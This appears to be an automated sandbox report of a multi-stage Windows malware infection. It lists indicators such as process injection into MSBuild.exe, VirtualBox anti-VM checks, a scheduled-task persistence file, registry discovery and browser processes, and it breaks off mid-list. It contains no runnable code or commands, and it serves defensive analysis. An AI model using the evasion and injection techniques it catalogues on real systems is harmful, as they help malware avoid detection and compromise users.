Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 4880 set thread context of 5196 4880 UYpk7xI.exe 97 PID 2428 set thread context of 4580 2428 jokererer.exe 101 PID 3416 set thread context of 7164 3416 jokererer.exe 218 PID 5416 set thread context of 2716 5416 UYpk7xI.exe 221 PID 3116 set thread context of 2492 3116 TbV75ZR.exe 236 PID 7092 set thread context of 7080 7092 xZRvIQ5.exe 261 PID 4992 set thread context of 1728 4992 EPTwCQd.exe 273 PID 13160 set thread context of 12980 13160 fd5d9b8176.exe 376 PID 6588 set thread context of 8148 6588 cf533b34eb.exe 378 PID 7796 set thread context of 5612 7796 4220f70f80.exe 382 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 36575e69.exe File opened (read-only) \??\VBoxMiniRdrDN a28245d7.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh a28245d7.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh a28245d7.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 3916 2492 WerFault.exe 236 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ab7380df2b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language u75a1_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fd5d9b8176.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language d0fba8cbde.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 36575e69.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ec9a0b61cd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 74957b3341.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0fba8cbde.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cf533b34eb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9ff7443f7f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b842abf8f3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage d0fba8cbde.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a28245d7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Checks processor information in registry 2 TTPs 38 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 74957b3341.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 74957b3341.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 6588 timeout.exe 10544 timeout.exe -
Enumerates system info in registry 2 TTPs 15 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 4672 taskkill.exe 4760 taskkill.exe 1084 taskkill.exe 1584 taskkill.exe 2032 taskkill.exe -
Modifies data under HKEY_USERS 6 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133876600710942280" chrome.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-83325578-304917428-1200496059-1000\{D0C0301C-D712-4ADE-8C67-99BDBA4C177D} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-83325578-304917428-1200496059-1000\{494D639E-04AF-4801-90B6-63A2E0290CCF} msedge.exe Key created \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings firefox.exe -
Modifies registry key 1 TTPs 5 IoCs
pid Process 10080 reg.exe 10416 reg.exe 9280 reg.exe 7452 reg.exe 9444 reg.exe -
NTFS ADS 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\{fd9989c1-9e82-4819-a5b2-63078bff6123}\pmem:\MappedFixedPe_svchost015.exe_12980_0x400000_0x2e000_0B89D888C30758F522722A59E7FFBFD53A2964A3A9EF582969F6EB032DAF310F a28245d7.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\{fd9989c1-9e82-4819-a5b2-63078bff6123}\pmem:\MappedFixedPe_svchost015.exe_8148_0x400000_0x2e000_D7D2BC7916A73F931BC40235672179D4D33F93405E3D0EF34E9D150A3DDB6578 a28245d7.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 9104 schtasks.exe 11436 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5044 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 5044 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 5788 rapes.exe 5788 rapes.exe 5196 MSBuild.exe 5196 MSBuild.exe 4580 MSBuild.exe 4580 MSBuild.exe 4580 MSBuild.exe 4580 MSBuild.exe 5196 MSBuild.exe 5196 MSBuild.exe 5424 chrome.exe 5424 chrome.exe 5488 b842abf8f3.exe 5488 b842abf8f3.exe 5488 b842abf8f3.exe 5488 b842abf8f3.exe 5488 b842abf8f3.exe 5488 b842abf8f3.exe 5196 MSBuild.exe 5196 MSBuild.exe 5196 MSBuild.exe 5196 MSBuild.exe 3608 rapes.exe 3608 rapes.exe 4536 ec9a0b61cd.exe 4536 ec9a0b61cd.exe 5196 MSBuild.exe 5196 MSBuild.exe 4536 ec9a0b61cd.exe 4536 ec9a0b61cd.exe 4536 ec9a0b61cd.exe 4536 ec9a0b61cd.exe 5196 MSBuild.exe 5196 MSBuild.exe 1192 74957b3341.exe 1192 74957b3341.exe 1192 74957b3341.exe 1192 74957b3341.exe 1192 74957b3341.exe 1192 74957b3341.exe 5020 chrome.exe 5020 chrome.exe 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 1192 74957b3341.exe 1192 74957b3341.exe 1192 74957b3341.exe 1192 74957b3341.exe 1192 74957b3341.exe 1192 74957b3341.exe 1360 ab7380df2b.exe 1360 ab7380df2b.exe 1360 ab7380df2b.exe 1360 ab7380df2b.exe 1360 ab7380df2b.exe 7164 MSBuild.exe 7164 MSBuild.exe 7164 MSBuild.exe 7164 MSBuild.exe 4404 rapes.exe -
Suspicious behavior: LoadsDriver 5 IoCs
pid Process 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe 7564 a28245d7.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 7116 u75a1_003.exe 7116 u75a1_003.exe 7116 u75a1_003.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs
pid Process 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 6088 msedge.exe 6088 msedge.exe 6088 msedge.exe 6088 msedge.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 3612 msedge.exe 3612 msedge.exe 3612 msedge.exe 3612 msedge.exe 3124 chrome.exe 3124 chrome.exe 3124 chrome.exe 3124 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 5424 chrome.exe Token: SeCreatePagefilePrivilege 5424 chrome.exe Token: SeShutdownPrivilege 5424 chrome.exe Token: SeCreatePagefilePrivilege 5424 chrome.exe Token: SeShutdownPrivilege 5424 chrome.exe Token: SeCreatePagefilePrivilege 5424 chrome.exe Token: SeShutdownPrivilege 5424 chrome.exe Token: SeCreatePagefilePrivilege 5424 chrome.exe Token: SeShutdownPrivilege 5424 chrome.exe Token: SeCreatePagefilePrivilege 5424 chrome.exe Token: SeShutdownPrivilege 5424 chrome.exe Token: SeCreatePagefilePrivilege 5424 chrome.exe Token: SeShutdownPrivilege 5424 chrome.exe Token: SeCreatePagefilePrivilege 5424 chrome.exe Token: SeShutdownPrivilege 5020 chrome.exe Token: SeCreatePagefilePrivilege 5020 chrome.exe Token: SeDebugPrivilege 2032 taskkill.exe Token: SeShutdownPrivilege 5020 chrome.exe Token: SeCreatePagefilePrivilege 5020 chrome.exe Token: SeShutdownPrivilege 5020 chrome.exe Token: SeCreatePagefilePrivilege 5020 chrome.exe Token: SeDebugPrivilege 4672 taskkill.exe Token: SeDebugPrivilege 4760 taskkill.exe Token: SeDebugPrivilege 1084 taskkill.exe Token: SeDebugPrivilege 1584 taskkill.exe Token: SeDebugPrivilege 1392 firefox.exe Token: SeDebugPrivilege 1392 firefox.exe Token: SeDebugPrivilege 1360 ab7380df2b.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe Token: SeDebugPrivilege 2376 tasklist.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe Token: SeDebugPrivilege 1332 tasklist.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe Token: SeShutdownPrivilege 3124 chrome.exe Token: SeCreatePagefilePrivilege 3124 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 5424 chrome.exe 6088 msedge.exe 6088 msedge.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 5020 chrome.exe 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 1392 firefox.exe 2720 d0fba8cbde.exe 1392 firefox.exe -
Suspicious use of SendNotifyMessage 29 IoCs
pid Process 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 2720 d0fba8cbde.exe 2032 Passwords.com 2032 Passwords.com 2032 Passwords.com 7956 9ff7443f7f.exe 7956 9ff7443f7f.exe 7956 9ff7443f7f.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5044 wrote to memory of 5788 5044 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 90 PID 5044 wrote to memory of 5788 5044 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 90 PID 5044 wrote to memory of 5788 5044 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 90 PID 5788 wrote to memory of 4880 5788 rapes.exe 96 PID 5788 wrote to memory of 4880 5788 rapes.exe 96 PID 4880 wrote to memory of 5196 4880 UYpk7xI.exe 97 PID 4880 wrote to memory of 5196 4880 UYpk7xI.exe 97 PID 4880 wrote to memory of 5196 4880 UYpk7xI.exe 97 PID 4880 wrote to memory of 5196 4880 UYpk7xI.exe 97 PID 4880 wrote to memory of 5196 4880 UYpk7xI.exe 97 PID 4880 wrote to memory of 5196 4880 UYpk7xI.exe 97 PID 4880 wrote to memory of 5196 4880 UYpk7xI.exe 97 PID 4880 wrote to memory of 5196 4880 UYpk7xI.exe 97 PID 4880 wrote to memory of 5196 4880 UYpk7xI.exe 97 PID 4880 wrote to memory of 5196 4880 UYpk7xI.exe 97 PID 4880 wrote to memory of 5196 4880 UYpk7xI.exe 97 PID 4880 wrote to memory of 5196 4880 UYpk7xI.exe 97 PID 5788 wrote to memory of 2428 5788 rapes.exe 100 PID 5788 wrote to memory of 2428 5788 rapes.exe 100 PID 2428 wrote to memory of 4580 2428 jokererer.exe 101 PID 2428 wrote to memory of 4580 2428 jokererer.exe 101 PID 2428 wrote to memory of 4580 2428 jokererer.exe 101 PID 2428 wrote to memory of 4580 2428 jokererer.exe 101 PID 2428 wrote to memory of 4580 2428 jokererer.exe 101 PID 2428 wrote to memory of 4580 2428 jokererer.exe 101 PID 2428 wrote to memory of 4580 2428 jokererer.exe 101 PID 2428 wrote to memory of 4580 2428 jokererer.exe 101 PID 2428 wrote to memory of 4580 2428 jokererer.exe 101 PID 5196 wrote to memory of 5424 5196 MSBuild.exe 102 PID 5196 wrote to memory of 5424 5196 MSBuild.exe 102 PID 5424 wrote to memory of 1028 5424 chrome.exe 103 PID 5424 wrote to memory of 1028 5424 chrome.exe 103 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 5424 wrote to memory of 436 5424 chrome.exe 104 PID 